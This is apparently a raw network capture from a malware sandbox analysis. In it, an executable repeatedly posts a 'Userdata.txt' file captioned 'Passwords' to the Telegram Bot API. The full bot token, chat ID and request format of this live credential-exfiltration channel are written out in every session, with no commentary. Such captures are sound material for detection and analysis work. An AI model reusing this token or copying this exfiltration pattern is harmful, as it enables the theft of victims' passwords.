                                                                                                          Data Ascii: --===============8dd31c9d79a2386Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:15 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:15 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:15 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43543,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540235,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.849930149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:17 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31de974860ee
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 65 39 37 34 38 36 30 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31de974860eeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:17 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:17 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:17 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43544,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540237,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.849946149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:19 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31f60959947b
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 36 30 39 35 39 39 34 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31f60959947bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:19 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:19 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:19 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43545,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540239,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.849958149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:20 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd320c0911f197
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 63 30 39 31 31 66 31 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd320c0911f197Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:21 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:21 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:21 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43546,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540241,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.849971149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:22 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32209989e033
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 30 39 39 38 39 65 30 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32209989e033Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:22 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:22 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:22 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43547,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540242,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.849983149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:24 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32351af635cd
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 35 31 61 66 36 33 35 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32351af635cdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:24 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:24 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:24 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43548,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540244,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.849996149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:26 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32498ceb8d8b
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 39 38 63 65 62 38 64 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32498ceb8d8bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:26 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:26 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:26 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43549,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540246,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          13192.168.2.849998149.154.167.220443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:30 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3189e59bd272
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 39 65 35 39 62 64 32 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3189e59bd272Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:30 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:30 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
